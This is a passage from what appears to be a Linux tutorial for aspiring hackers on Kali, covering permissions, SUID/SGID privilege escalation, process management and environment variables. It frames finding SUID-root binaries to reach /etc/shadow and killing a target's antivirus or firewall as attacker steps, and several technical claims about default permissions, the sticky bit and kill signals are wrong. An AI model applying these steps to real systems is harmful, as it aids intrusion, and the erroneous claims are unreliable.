do that by checking a file’s permissions.
Checking Permissions
When you want to find out what permissions are granted to users for a file
or directory, use the ls command with the -l (long) switch to display the
contents of a directory in long format. This list will contain the permissions.
The following example shows use of the ls –l command on the file
/usr/share/hashcat (one of my favorite password-cracking tools) in order to
see what we can learn about the files there:

kali> ls –l /usr/share/hashcat
total 32952
drwxr-xr-x  5  root  root    4096     Dec 5 10:47
-rw-r--r--  1  root  root    33685504 June 28 202
-rw-r--r--  1  root  root    33685504 June 28 202
drwxr-xr-x  2  root  root    4096     Dec 5 10:47
drwxr-xr-x  2  root  root    4096     Dec 5 10:47
drwxr-xr-x  3  root  root    4096     Dec 5 10:47
On each line, we get information about:
The file type (this is the first character listed)
The file’s permissions for the owner, groups, and users, respectively (this
is the rest of this section)
The number of links (a topic that is beyond the scope of the book)
The owner of the file
The size of the file in bytes
The time at which the file was created or last modified
The name of the file
For now, let’s focus on the seemingly incomprehensible strings of letters
and dashes on the left edge of each line. These tell us whether an item is a
file or directory and what permissions, if any, are on it.

The first character tells you the file type, where d stands for a directory and
a dash (–) indicates a file. These are the two most common file types.
The next section defines the permissions on the file. There are three sets of
three characters, made of some combination of read (r), write (w), and
execute (x), in that order. The first set represents the permissions of the
owner; the second, those of the group; and the last, those of all other users.
Regardless of which set of three letters you’re looking at, for files, if you
see an r first, that user or group of users has permission to open and read
that file or directory. A w as the middle letter means they can write to
(modify) the file, and an x at the end means they can execute (or run) the
file or access the directory. If any r, w, or x is replaced with a dash (-), the
respective permission hasn’t been given. Note that users can have
permission to execute only either binaries or scripts.
Let’s use the third line of that output as an example:
-rw-r--r-- 1   root  root    33685504 June 28 202
The file is called, as we know from the right end of the line, hashcat.hcstat.
After the initial – (which indicates it’s a file), the permissions rw- tell us that
the owner has read and write permissions but not execute permission.

The next set of permissions (r--) represents those of the group and shows
that the group has read permission but not write or execute permissions.
And, finally, we see that the rest of the users also have only read permission
(r--).
These permissions aren’t set in stone. As a root user or file owner, you can
change them. Next, we’ll do just that.
Changing Permissions
We can use the Linux command chmod (or change mode) to change the
permissions. Only a root user or the file’s owner can change permissions.
In this section, we use chmod to change permissions on hashcat.hcstat using
two different methods. First, we use a numerical representation of
permissions, and then we use a symbolic representation.
Changing Permissions with Decimal Notation
We can use a shortcut to refer to permissions by using a single number to
represent one rwx set of permissions. Like everything underlying the
operating system, permissions are represented in binary, so ON and OFF
switches are represented by 1 and 0, respectively. You can think of the rwx
permissions as three ON/OFF switches, so when all permissions are
granted, this equates to 111 in binary.

We can then easily represent a binary set like this as a single digit by
converting it into octal, an eight-digit number system that starts with 0 and
ends with 7. An octal digit represents a set of three binary digits, meaning
we can represent an entire rwx set with one digit. Table 5-1 contains all
possible permission combinations and their octal and binary representatives.
Table 5-1: Octal and Binary
Representations of Permissions
Binary Octal rwx
000 0 ---
001 1 --x
010 2 -w-
011 3 -wx
100 4 r--
101 5 r-x
110 6 rw-

Binary Octal rwx
111 7 rwx
Using this information, let’s go through some examples. First, if we want to
set only the read permission, we could consult Table 5-1 and locate the
value for read:
r w x
4 - -
Next, if we want to set the permission to wx, we could use the same
methodology and look for what sets the w and what sets the x:
r w x
- 2 1
Notice in Table 5-1 that the octal representation for -wx is 3, which not so
coincidently happens to be the same value we get when we add the two
values for setting w and x individually: 2 + 1 = 3.
Finally, when all three permissions are on, it looks like this:

r w x
4 2 1
And 4 + 2 + 1 = 7. We see that in Linux, when all the permission switches
are on, they are represented by the octal equivalent of 7. So, if we wanted to
represent all permissions for the owner, group, and all users, we could write
it as follows:
7 7 7
Here’s where the shortcut comes in. By passing chmod three octal digits (one
for each rwx set), followed by a filename, we can change permissions on that
file for each type of user. Enter the following into your command line:
kali> sudo chmod 774 hashcat.hcstat
Looking at Table 5-1, we can see that this statement gives the owner all
permissions, the group all permissions, and everyone else only the read
permission.
Now we can see whether those permissions have changed by running ls -l
on the directory and looking at the hashcat.hcstat line. Navigate to the
directory and run that command now:

kali> ls -l
   total 32952
   drwxr-xr-x 5     root  root        4096   Dec 
➊ -rwxrwxr-- 1     root  root    33685504   June
   -rw-r--r-- 1     root  root    33685504   June
   drwxr-xr-x 2     root  root        4096   Dec 
   drwxr-xr-x 2     root  root        4096   Dec 
   drwxr-xr-x 3     root  root        4096   Dec 
You should see -rwxrwxr-- on the left side of the hashcat.hcstat line ➊. This
confirms that the chmod call successfully changed permissions on the file to
give both the owner and the group the ability to execute the file.
Changing Permissions with UGO
Although the numeric method is probably the most common method for
changing permissions in Linux, some people find chmod’s symbolic method
more intuitive. Both methods work equally well, so choose the one that
suits you. The symbolic method is often referred to as UGO syntax, which
stands for user (or owner), group, and others.
UGO syntax is very simple. Enter the chmod command followed by the users
you want to change permissions for, providing u for user, g for group, or o
for others, and one of three operators:

- Removes a permission
+ Adds a permission
= Sets a permission
After the operator, include the permission you want to add or remove (rwx)
and, finally, the name of the file to apply it to. For example, if you want to
remove the write permission from the user that the file hashcat.hcstat
belongs to, you could enter the following:
kali> sudo chmod u-w hashcat.hcstat
This command says to remove (-) the write (w) permission from
hashcat.hcstat for the user (u).
Now when you check the permissions with ls –l again, you should see that
the hashcat.hcstat file no longer has write permission for the user:
kali> ls -l
total 32952
drwxr-xr-x 5    root  root        4096    Dec 5 1
-r-xr-xr-- 1    root  root    33685504   June 28 
-rw-r--r-- 1    root  root    33685504   June 28 
drwxr-xr-x 2    root  root        4096    Dec 5 1
drwxr-xr-x 2    root  root        4096    Dec 5 1
drwxr-xr-x 3    root  root        4096    Dec 5 1

You can also change multiple permissions with just one command. If you
want to give both the user and other users (not including the group) the
execute permission, you could enter the following:
kali> sudo chmod u+x, o+x hashcat.hcstat
This command tells Linux to add the execute permission for the user as well
as the execute permission for others for the hashcat.hcstat file.
Giving Root Execute Permission on a New Tool
As a hacker, you’ll often need to download new hacking tools, but because
Linux automatically assigns all files and directories default permissions of
666 and 777, respectively, you won’t be able to execute a file immediately
after downloading it. If you try, you’ll usually get a message that says
something like “Permission denied.” In these cases, you’ll need to give
yourself root and execute permissions using chmod in order to execute the
file.
For example, say we download a new hacker tool called newhackertool and
place it into the root user’s directory (/).
   kali> ls -l
   total 80
   drwxr-xr-x  7  root  root  4096  Dec 5  11.17

drwxr-xr-x  7  root  root  4096  Dec 5  11.17 
   drwxr-xr-x  7  root  root  4096  Dec 5  11.17 
   drwxr-xr-x  7  root  root  4096  Dec 5  11.17 
➊ -rw-r--r--  1  root  root  1072  Dec 5  11.17 
   drwxr-xr-x  7  root  root  4096  Dec 5  11.17 
   drwxr-xr-x  7  root  root  4096  Dec 5  11.17 
   drwxr-xr-x  7  root  root  4096  Dec 5  11.17 
   drwxr-xr-x  7  root  root  4096  Dec 5  11.17 
We can see newhackertool ➊, along with the rest of the contents of the root
directory. We can see that our newhackertool doesn’t have execute
permission for anyone. This makes it impossible to use. It might seem
strange that, by default, Linux won’t let you execute a file you downloaded,
but overall, this setting makes your system more secure.
We can give ourselves permission to execute newhackertool by entering the
following:
kali> sudo chmod 766 newhackertool
Now, when we perform a long listing on the directory, we can see that our
newhackertool has execute permission for the owner:
root@kali> ls -l
total 80

--snip--
drwxr-xr-x  7  root  root  4096  Dec  5  11.17  M
-rwxrw-rw-  1  root  root  1072  Dec  5  11.17  n
drwxr-xr-x  7  root  root  4096  Dec  5  11.17  P
--snip--
This grants us (as the owner) all permissions, including execute, and grants
the group and everyone else only read and write permissions (4 + 2 = 6).
Setting More Secure Default Permissions with
Masks
As previously mentioned, Linux automatically assigns base permissions
(usually 666 for files and 777 for directories). You can change the default
permissions allocated to files and directories created by each user with the
umask (or user file-creation mask) method. The umask method represents the
permissions you want to remove from the base permissions on a file or
directory to make them more secure.
The umask is a three-digit octal number corresponding to the three
permissions digits; this number is subtracted from the permissions number
to give the new permissions status. This means that when a new file or
directory is created, its permissions are set to the default value minus the
value in umask, as shown in Figure 5-1.

Figure 5-1: How a umask value of 022 affects the permissions on new files and directories
For example, if the umask is set to 022, a new file with the original default
permissions of 666 will now have the permissions 644, meaning the owner
has both read and write permissions, and the group and all other users have
only read permission.
In Kali, as with most Debian systems, the umask is preconfigured to 022,
meaning the Kali default is 644 for files and 755 for directories.
The umask value is not universal to all users on the system. Each user can set
a personal default umask value for the files and directories in their personal
.profile file. To see the current value when logged on as a certain user,
simply enter the command umask and note what is returned. To change the
umask value for that user, edit the file /home/username/.profile and, for
example, add umask 007 to set it so only the user and members of the user’s
group have permissions.
Special Permissions

In addition to the three general-purpose permissions, rwx, Linux has three
special permissions that are slightly more complicated. These special
permissions are set user ID (or SUID), set group ID (or SGID), and sticky bit.
I’ll discuss each in turn in the next three sections.
Granting Temporary Root Permissions with SUID
As you should know by now, a user can execute a file only if they have
permission to execute that particular file. If the user has only read and/or
write permissions, they cannot execute the file. This may seem
straightforward, but there are exceptions to this rule.
You may have encountered files that require the permissions of the root user
during execution, even for users who are not root. For example, a file that
allows users to change their password would need access to the /etc/shadow
file, which holds the users’ passwords in Linux, and so requires root-user
privileges in order to execute.
In such a case, you can temporarily grant the owner’s privileges to execute
the file by setting the SUID bit on the program. Basically, the SUID bit says that
any user can execute the file with the permissions of the owner but that
those permissions don’t extend beyond the use of that file.
To set the SUID bit, enter a 4 before the regular permissions. For example, a
file with a new resulting permission of 644 is represented as 4644 when the
SUID bit is set. Setting the SUID on a file is not something a typical user would

do, but if you want to do so, you’ll use the chmod command, as in chmod 4644
filename.
Granting the Root User’s Group Permissions SGID
The SGID bit also grants temporary elevated permissions, but it grants the
permissions of the file owner’s group, rather than of the file’s owner. This
means that, with an SGID bit set, someone without execute permission can
execute a file if the owner belongs to the group that has permission to
execute that file.
The SGID bit works slightly differently when applied to a directory: when the
bit is set on a directory, ownership of new files created in that directory
goes to the directory creator’s group, rather than the file creator’s group.
This is very useful when a directory is shared by multiple users, as all users
in that group, not just a single user, can execute the files.
The SGID bit is represented as 2 before the regular permissions, so a new file
with the resulting permissions 644 would be represented as 2644 when the
SGID bit is set. Again, you would use the chmod command for this—for
example, chmod 2644 filename.
The Outmoded Sticky Bit
The sticky bit is a permission bit that you can set on a directory to allow a
user to delete or rename files within that directory. However, the sticky bit

is a legacy of older Unix systems, and modern systems (like Linux) ignore
it. As such, I will not discuss it further here, but you should be familiar with
the term because you might hear it in the Linux world.
Special Permissions, Privilege Escalation, and the Hacker
As a hacker, you can use these special permissions to exploit Linux systems
through privilege escalation, whereby a regular user gains root or sysadmin
privileges and the associated permissions. With root privileges, you can do
anything on the system.
One way to do this is to exploit the SUID bit. A system administrator or
software developer might set the SUID bit on a program to allow that
program access to files with root privileges. For instance, scripts that need
to change passwords often have the SUID bit set. You, the hacker, can use that
permission to gain temporary root privileges and do something malicious,
such as get access to the passwords at /etc/shadow.
Let’s look for files with the SUID bit set on our Kali system to try this out.
Back in Chapter 1, I introduced you to the find command. We’ll use its
power to find files with the SUID bit set.
As you’ll remember, the find command is powerful, but the syntax is bit
more complicated than some of the other location commands, such as locate
and which. Take a moment to review the find syntax in Chapter 1 if you need
to.

In this case, we want to find files anywhere on the filesystem, for the root
user or other sysadmin, with the permissions 4000. To do this, we can use the
following find command:
kali> sudo find / -user root -perm -4000
With this command, we ask Kali to start looking at the top of the filesystem
with the / syntax. It then looks everywhere below / for files that are owned
by root, specified with user root, and that have the SUID permission bit set (-
perm -4000).
When we run this command, we get the following output:
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/kismet_capture
--snip--
The output reveals numerous files that have the SUID bit set. Let’s navigate
to the /usr/bin directory where many of these files reside, and then run a
long listing on that directory and scroll down to the sudo file:

root@kali> cd /usr/bin
   root@kali> ls -l
   --snip--
   -rwxr-xr-x 1  root  root  176272    Jul 18 202
   -rwxr-xr-x 1  root  root   26696    Mar 17 202
➊ -rwsr-xr-x 1  root  root  140944    Jul 5  202
   --snip--
Note that the first set of permissions (those for the owner) has an s in place
of the x ➊. This is how Linux represents that the SUID bit is set, and it means
that anyone who runs the sudo file has the privileges of the root user, which
can be a security concern for the sysadmin and a potential attack vector for
the hacker. For instance, some applications need to access the /etc/shadow
file to successfully complete their tasks. If the attacker can gain control of
that application, they can use that application’s access to the passwords on a
Linux system.
Linux has a well-developed security system to protect files and directories
from unauthorized access. The aspiring hacker needs to have a basic
understanding of this system not only to protect their files but also to
execute new tools. In some cases, hackers can exploit the SUID and SGID
permissions to escalate privileges from a regular user to a root user.
Summary

Linux uses permissions to protect a user’s or group’s files and directories
from other users, and you can take advantage of these for both offensive
and defensive purposes. You should now know how to manage permissions
and how to exploit weak points in this security system, in particular SUID and
SGID bits.
Exercises
1. Select a directory and run a long listing on it. Note the permissions on
the files and directories.
2. Select a file you don’t have permission to execute and give yourself
execute permissions using the chmod command. Try using both the
numeral method (777) and the UGO method.
3. Choose another file and change its ownership using chown.
4. Use the find command to find all files with the SGID bit set.
OceanofPDF.com

6
PROCESS MANAGEMENT

At any given time, a typical Linux system has hundreds, or sometimes even
thousands, of processes running simultaneously. A process is simply a
program that runs and uses resources, whether it be a terminal, a web
server, any running commands, any databases, the GUI interface, or
something else.
Any good Linux administrator, and particularly any hacker, needs to
understand how to manage their processes to optimize their systems. For
example, once a hacker takes control of a target system, they might want to
find and stop an antivirus application or firewall. To do so, the hacker
would first need to know how to find this process. The hacker might also
want to set a scanning script that runs periodically to find vulnerable
systems, so we’ll also look at how to schedule such a script.
In this chapter, you’ll learn to manage those processes. First, you’ll learn to
view and find processes and how to discover which processes are using the
most resources. Then, you’ll learn to manage processes by running them in
the background, prioritizing them, and killing them if necessary (no blood
involved). Finally, you’ll learn to schedule processes to run on specified
days and dates and at specific times.
Viewing Processes
In most cases, the first step in managing processes is to view what
processes are running on your system. The primary tool for viewing

processes, and one of the Linux administrator’s best friends, is the ps
command. Run it in your command line to see what processes are active:
kali> ps
PID    TTY      TIME      CMD
39659  pts/0    00:00:01  bash
39665  pts/0    00:00:00  ps
The Linux kernel, the inner core of the operating system that controls nearly
everything, assigns a unique process ID (PID) to each process sequentially,
as the processes are created. When working with these processes in Linux,
you often need to specify their PIDs, so it is far more important to note the
PID of the process than the name of the process.
Alone, the ps command doesn’t really provide you with much information.
Running the ps command without any options lists the processes started (or
invoked) by the currently logged-in user (in our case, root) and what
processes are running on that terminal. Here, it simply says that the bash
shell is open and running and that we ran the ps command.
We generally want far more information than that. In particular, we’d like to
know about processes run by other users and by the system in the
background. Without this information, we won’t understand much of what
is actually taking place on our system. Running the ps command with the
option aux will display all processes running on the system for all users, as

shown in Listing 6-1. Note that you shouldn’t prefix this option with a dash
(-) and that you should write it in lowercase; because Linux is case-
sensitive, using uppercase options would give you significantly different
results.
kali> ps aux
USER  PID   %CPU  %MEM    VSZ    RSS TTY    STAT 
root    1    0.0   0.4    202540  6396 ?    Ss   
root    2    0.0   0.0         0     0 ?    S    
root    3    0.0   0.0         0     0 ?    S    
--snip--
root  39706  0.0  0.2  36096  3204 pts/0    R+ 15
Listing 6-1: Using the aux options to see processes for all users
As you can see, this command now lists so many processes that they likely
run off the bottom of your screen. The first process is init, listed in the final
column, and the last process is the command we just ran, ps aux. Many of
the details (PID, %CPU, TIME, COMMAND, and so on) may be different on your
system but should have the same format. For our purposes, here are the
most important columns in this output:
USER The user who invoked the process
PID The process ID
%CPU The percent of CPU this process is using

%MEM The percent of memory this process is using
COMMAND The name of the command that started the process
In general, to perform any action on a process, we must specify its PID.
Let’s see how to use this identifier to our advantage.
Filtering by Process Name
When we inquire about processes, we usually don’t want every single
process displayed on the screen. It’s simply a problem of too much
information. Most often, we want to find information about a single
process. To do so, we can use the filtering command grep, which I
introduced in Chapter 1.
To demonstrate, we’ll use the Metasploit exploitation framework, the most
widely used exploitation framework (and nearly every hacker’s good
friend). It comes installed on your Kali system, so you can start it with the
following:
kali> msfconsole
Once the exploitation framework has been started, let’s see whether we can
find it in the list of processes. Metasploit has now taken over this terminal,
so open another terminal. Now, use the ps aux command and then pipe it (|)
to grep, looking for the string msfconsole, as in Listing 6-2.

kali> ps aux | grep msfconsole
kali 39756  0.00.0  4304  716  pts/2 Ss+  15:13  
 postgresql start &&msfdbinit&msfconsole
kali 39759  35.1  15.2  4304  227888  pts/2 Sl+  
kali 39892  0.00.0  4304  940  pts/2 S+  15:18  0
Listing 6-2: Filtering a ps search to find a particular process
From the filtered output in this listing, you should see all the processes that
match the term msfconsole. The PostgreSQL database, which is the database
Metasploit uses, is shown first, followed by the msfconsole program itself,
from /usr/bin/msfconsole. Finally, you should see the grep command you
used to look for msfconsole. Notice that the output did not include the column
header list from ps. Since the keyword, msfconsole, is not in the header, it is
not displayed. Even so, the results show up in the same format.
From this, you can learn some important information. If, for example, you
need to know how many resources Metasploit is using, you can consult the
third column (CPU), to see that it’s using 35.1 percent of your CPU, and
consult the fourth column to see that it’s using 15.2 percent of your system
memory. That’s quite a bit. It’s a demanding beast!
Finding the Greediest Processes with top

When you enter the ps command, it displays the processes in the order they
were started. In many cases, though, we want to know which processes are
using the most resources. This is where the top command comes in handy; it
displays the processes ordered by resources used, starting with the largest.
Unlike the ps command, which gives us a one-time snapshot, top refreshes
the list every three seconds by default. This lets you monitor those resource-
hungry processes, as shown in Listing 6-3.
kali> top
top - 15:31:17 up 2 days, 6:50, 4 users, load ave
Tasks: 176 total, 1 running, 175 sleeping, 0 stop
%Cpu(s): 1.3 us, 0.7 sy, 0.0 ni, 97.4 id, 0.0 wa,
MB Mem : 1491220 total,  64848 free, 488272 used,
MB Swap : 1046524 total, 1044356 free, 2168 used
PID   USER  PR  NI   VIRT    RES     SHR    S  %C
39759 root  20   0   893180  247232  11488  S  0
39859 root  20   0   27308   16796   14272  S  0
39933 root  20   0   293936  61500   29108  S  0
--snip--
Listing 6-3: Finding the greediest processes with top
System administrators often keep top running in a terminal to monitor the
use of process resources. As a hacker, you may want to do the same,

especially if you have multiple tasks running on your system. While you
have top running, pressing the H or ? key will bring up a list of interactive
commands, and pressing Q will quit top. You’ll use top again soon to
manage your processes in “Changing Process Priority with nice” below and
“Killing Processes” on page 66.
Managing Processes
Hackers often need to multiprocess. For example, they may simultaneously
run a port scanner, a vulnerability scanner, and an exploit. This requires that
the hacker manage these processes efficiently to best use system resources
and complete their tasks. In this section, I’ll show you how to manage
multiple processes.
Changing Process Priority with nice
You don’t often hear the word nice used in the context of hackers, but here
is an exception. The nice command is used to influence the priority of a
process. As you saw when we ran the ps command, numerous processes run
on the system at once, contending for the available resources. The kernel
will have final say over the priority of a process, but you can use nice to
suggest that a process should be elevated in priority.
The idea behind the use of the term nice is that, when you use it, you’re
determining how nice you’ll be to other users; if your process is using most

of the system resources, you aren’t being very nice.
The values passed to nice range from −20 to +19, with zero being the
default value (see Figure 6-1). A high nice value translates to a low priority,
and a low nice value translates to a high priority (meaning you’re not being
so nice to other users and processes). When a process is started, it inherits
the nice value of its parent process. The owner of the process can lower the
priority of the process but cannot increase its priority. Of course, the
superuser or root user can arbitrarily set the nice value to whatever they
please.
Figure 6-1: Niceness priority values
When you start a process, you can set the priority level with the nice
command and then alter the priority after the process has started running
with the renice command. The syntax for these two commands is slightly
different and can be confusing. The nice command requires that you
increment the nice value, whereas the renice command wants an absolute
value for niceness. Let’s look at an example to demonstrate this.
Setting the Priority When Starting a Process

For demonstration purposes, let’s assume we have a process named
slowprocess that’s located at /bin/slowprocess. If we wanted it to speed up its
completion, we could start the process with the nice command:
kali> sudo nice -n -10 /bin/slowprocess
This command would increment the nice value by -10, increasing its priority
and allocating it more resources.
On the other hand, if we want to be nice to our fellow users and processes
and give slowprocess a lower priority, we could increment its nice value
positively by 10:
kali> sudo nice -n 10 /bin/slowprocess
Give this a try on a process you have currently running and then run ps to
see how it changes, if at all.
Changing the Priority of a Running Process with renice
The renice command takes absolute values between –20 and 19 and sets the
priority to that particular level, rather than increasing or decreasing it from
the level at which it started. In addition, renice requires you to supply the
PID of the process you are targeting rather than its name. So, if slowprocess
is using an inordinate amount of resources on your system and you want to

give it a lower priority to allow other processes access to more resources,
you could renice the slowprocess (which has a PID of 6996) and give it a
much higher nice value, like so:
kali> sudo renice 19 6996
As with nice, only the root user can renice a process to a negative value to
give it higher priority, but any user can reduce priority.
You can also use the top utility to change the nice value. With the top utility
running, simply press the R key and then supply the process’s PID and a
nice value. Listing 6-4 shows the top utility running and its output when I
press the R key and supply the PID and nice value.
   top - 21:36:56 up 21:41,  2 users, load averag
   Tasks: 128 total,  1 running, 127 sleeping, 0 
   %Cpu(s): 1.5 us, 0.7 sy, 0.0 ni, 96.7 id, 1.1 
   KiB Mem:  511864 total,  500780 used, 11084 fr
   KiB Swap:  901116 total,  14444 used,  886672 
➊ PID to renice
   |
   PID   USER  PR  NI  VIRT   RES   SHR   S  %CPU
   5451  root  20  0   1577m  19m   14m   S  5.3 
   2766  root  20  0   55800  20m   5480  S  2.6 
   5456  root  20  0   6356   4272  1780  S  1.3

7     root  20  0   0      0     0     S  0.3 
   5762  root  20  0   174m   20m   17m   S  0.3 
Listing 6-4: Changing a nice value when top is in use
When I press the R key, I’m asked for the PID ➊ with the text renice PID
[value] to value. The output should then change to reflect the new priorities.
Killing Processes
At times, a process will consume way too many system resources, exhibit
unusual behavior, or, at worst, freeze. Such a process is often referred to as
a zombie process. For you, probably the most problematic symptom will be
wasted resources used by the zombie that could be better allocated to useful
processes.
When you identify a problematic process, you may want to stop it with the
kill command. There are many ways to kill a program, as the kill command
has 64 kill signals, and each does something slightly different. Here, we
focus on a few you will likely find most useful. The syntax for the kill
command is kill -signalPID, where the signal switch is optional. If you don’t
provide a signal flag, it defaults to SIGTERM. Table 6-1 lists the common kill
signals.
Table 6-1: Commonly Used Kill Signals

Signal
name
Number
for
option
Description
SIGHUP 1 This is known as the Hangup (HUP) signal.
It stops the designated process and restarts
it with the same PID.
SIGINT 2 This is the Interrupt (INT) signal. It is a
weak kill signal that isn’t guaranteed to
work but does in most cases.
SIGQUIT 3 This is known as the core dump. It
terminates the process and saves the
process information in memory. Then it
saves this information in the current
working directory to a file named core.
(The reasons for doing this are beyond the
scope of this book.)
SIGTERM 15 This is the Termination (TERM) signal. It is
the kill command’s default kill signal.

Signal
name
Number
for
option
Description
SIGKILL 9 This is the absolute kill signal. It forces the
process to stop by sending the process’s
resources to a special device, /dev/null.
Using the top command, you can identify which processes are using too
many resources; often, those processes will be legitimate, but there may
also be malicious processes taking resources that you’ll want to kill.
If you merely want to restart a process with the HUP signal, enter the -1
option with kill, like so:
kali> sudo kill -1 6996
In the case of a zombie or a malicious process, you likely want to send the
kill -9 signal, the absolute kill signal, to the process. This makes sure the
process is terminated.
kali> sudo kill -9 6996

If you don’t know a process’s PID, you can use the killall command to kill
the process. This command takes the name of the process, instead of the
PID, as an argument.
For example, you could terminate a hypothetical zombieprocess like this:
kali> sudo killall -9 zombieprocess
Finally, you can also terminate a process in the top command. Simply press
the K key and then enter the PID of the offending process.
Running Processes in the Background
In Linux, whether you’re working from the command line or the GUI,
you’re operating in a shell. All commands you run are executed from within
that shell, even if they run from the graphical interface. When you execute a
command, the shell waits until the command is completed before offering
another command prompt.
At times, you may want a process to run in the background, rather than
having to wait for it to complete in that terminal. For instance, say we want
to work on a script in a text editor. We’d enter the following to call our text
editor (mousepad):

kali> sudo mousepad newscript
The bash shell will open mousepad to create newscript. While we work in
mousepad, the terminal will be busy running it and won’t display a new
prompt that would allow us to enter more commands.
We could, of course, open another terminal to run more commands, but a
better option to save resources and screen real estate is to start the text
editor running in the background. Running a process in the background
simply means that it will continue to run without needing the terminal. In
this way, the terminal is freed up for other duties.
To start the text editor in the background, just append an ampersand (&) to
the end of the command, like so:
kali> sudo mousepad newscript &
Now, when the text editor opens, the terminal returns a new command
prompt so we can enter other commands on our system while also editing
our newscript. This is effective for any process that may run for a
significant length of time when you want to use the terminal. As a hacker,
you’ll find this useful for running multiple terminals with multiple tasks,
allowing you to save resources and screen space.

You can also move a process to the background using the bg command
followed by the PID of the process. If you don’t know the PID, you can use
the ps command to find it.
Moving a Process to the Foreground
If you want to move a process running in the background to the foreground,
you can use the fg (foreground) command. The fg command requires the
name of the process you want to return to the foreground, as shown here:
kali> sudo fg newscript
Scheduling Processes
Both Linux system administrators and hackers often need to schedule
processes to run at a particular time of day. A system administrator might
want to schedule a system backup to run every Saturday night at 2:00 AM,
for example. A hacker might want to set a script to run on a regular basis
that looks for open ports or vulnerabilities. In Linux, you can accomplish
this in at least two ways: with at and crond.
The at command is used to set up the daemon (a background process) atd,
which is useful for scheduling a job to run once at some point in the future.
The crond daemon is more suited for scheduling tasks to occur every day,
week, or month, and we’ll cover it in detail in Chapter 16.

To use at, you must install it on your system:
kali> sudo apt install at
We use the at daemon to schedule the execution of a command or set of
commands in the future, following the command by the time at which to
execute the process. The time argument can be provided in various formats.
Table 6-2 contains the most common at time formats.
Table 6-2: Time Formats Accepted by the at Command
Time format Meaning
at 7:20pm Scheduled to run at 7:20 PM on the
current day
at 7:20pm June 25 Scheduled to run at 7:20 PM on June 25
at noon Scheduled to run at noon on the current
day
at noon June 25 Scheduled to run at noon on June 25
at tomorrow Scheduled to run tomorrow

Time format Meaning
at now + 20 minutes Scheduled to run in 20 minutes from the
current time
at now + 10 hours Scheduled to run in 10 hours from the
current time
at now + 5 days Scheduled to run in five days from the
current date
at now + 3 weeks Scheduled to run in three weeks from the
current date
at 7:20pm 06/25/2024 Scheduled to run at 7:20 PM on June 25,
2025
When you enter the at daemon with the specified time, at goes into
interactive mode, and you’ll be greeted with an at> prompt. Here is where
you enter the command you want executed at the specified time:
kali> sudo at 7:20am
at> /root/myscanningscript

This code snippet will schedule myscanningscript to execute today at 7:20
AM. When you want to stop entering commands, press CTRL-D.
Summary
Managing processes in Linux is a key skill for every Linux user and hacker.
You must be able to view, find, kill, prioritize, and schedule processes to
manage your Linux instance optimally. A hacker often will need to find
processes on the target they want to kill, such as the antivirus software or a
firewall. They will also need to manage multiple processes in an attack and
prioritize them.
Exercises
1. Run the ps command with the aux options on your system and note which
process is first and which is last.
2. Run the top command and note the two processes using the greatest
amount of resources.
3. Use the kill command to kill the process that uses the most resources.
4. Use the renice command to reduce the priority of a running process to
+19.
5. Create a script called myscanning (to see how to write a bash script, see
Chapter 8; the content of the script is not important) with a text editor
and then schedule it to run next Wednesday at 1:00 AM.

7
MANAGING USER ENVIRONMENT
VARIABLES

To get the most from your Linux hacking system, you need to understand
environment variables and be adept at managing them for optimal
performance, convenience, and even stealth. Environment variables are
process-wide variables built into your system and interface that control the
way your system looks, acts, and “feels” to the user, and they are inherited
by any child shells or processes. Shell variables, on the other hand, are
typically listed in lowercase and are valid only in the shell they are set in.
Among the topics that Linux newcomers find problematic, managing the
user environment variables might be the most difficult to master. We cover
some of the most useful skills for environment and shell variables in this
chapter, without going too deep into the differences between them. In Kali
Linux, your environment is your bash shell. Each user, including root, has a
default set of environment variables that determine how the system looks,
acts, and feels. You can change the values for these variables to make your
system work more efficiently, tailor your work environment to best meet
your individual needs, and potentially cover your tracks if you need to.
Changing the Default Shell to Bash
At this time, I need to delve into some Linux esoterica. I apologize before I
even start. I’ll try to keep it brief.
What we often refer to as the terminal is technically a “shell.” It provides us
with access through the command line to the operating system, in this case,

Linux. Almost from its birth, Linux has used the Bourne-Again SHell
(BASH) as its default shell. Of course, it’s not the only shell available, but
most people like it and have grown accustomed to its quirks and features. In
recent years, there has been a movement toward another shell known as the
Z shell (zsh), which offers some new and different features from the bash
shell. It was recently adopted by both Apple and the developers of Kali. It is
now the default shell in Kali.
A major purpose of this book is to teach Linux in a concise and
understandable way. Bash is used on nearly every other Linux distribution
you might work on, except Kali. For that reason, I think it is best, at this
point in time, to change the default shell in our Kali system to the more
widely used bash. Fortunately, the developers of Kali have made it
extraordinarily simple to change from the default Z shell to tried-and-true
bash, so let’s do that.
At the Kali prompt, enter kali-tweaks:
kali> sudo kali-tweaks
After pressing ENTER, a simple graphical interface will pop up, like the one
shown in Figure 7-1, bringing you fond memories of Windows 98 (a simple
design with primary colors).

Figure 7-1: kali-tweaks
Using this menu, you can harden your command line interface to make it
more secure, install additional tools for hacking, configure your
repositories, change your shell and prompt, and configure your virtual
machines.
Press the down arrow until Shell & Prompt is highlighted, then press
ENTER to select it. The next screen should offer you three choices: Configure
Prompt, Set the Default Login Shell, and Reset the Shell Config files.
Highlight the second option and press ENTER.
Now you should see two options for the default login shell, bash or Z shell.
Highlight bash, press the spacebar to select it, then click Apply. Close the
shell and log out. When you log back in, you will be in the bash shell.

Viewing and Modifying Environment Variables
You can view all your default environment variables by entering env into
your terminal from any directory:
kali> env
XDG_VTNR=7
SSHAGENT_PID=922
XDG_SESSION_ID=2
XDG_GREETER_DATA_DIR=/var/lib/lightdm/data/root
GLADE_PIXMAP_PATH=:echo
TERM=xterm-256color
SHELL=/bin/bash
--snip--
USER=kali
--snip--
PATH=/usr/local/sbin :usr/local/bin:/usr/sbin:/sb
--snip--
HOME=/kali
--snip--
As shown here, variables are simply strings in key-value pairs. Generally,
each pair follows the format KEY=value, though variables with multiple values
will look like this: KEY=value1:value2. As with most things in Linux, if the
value contains spaces, they need to be contained in quotation marks.

Environment variables are always uppercase, as in HOME, PATH, SHELL, and so
on. The ones shown here are only the default environment variables that
come on your system. Users can also create their own variables, and as you
will see, we need a different command to include those in the output.
Viewing All Environment Variables
To view all environment variables, including shell variables, local variables,
and shell functions, such as any user-defined variables and command
aliases, use the set command. This command lists all environment variables
unique to your system, which in most cases will give you an output so long
you won’t be able to view it all on a single screen. You can request to view
each variable, line by line, in a more accessible fashion using set and piping
it to the more command, as follows:
kali> set | more
BASH=/bin/bash
BASHOPTS=checkwinsize:cmdlist:complete_fullquote
BASH_ALIASES=()
BASH_ARGC=([0] = "0")
BASH_ARGV=()
--snip--
Now the list of variables fills up one screen, line by line, and then stops.
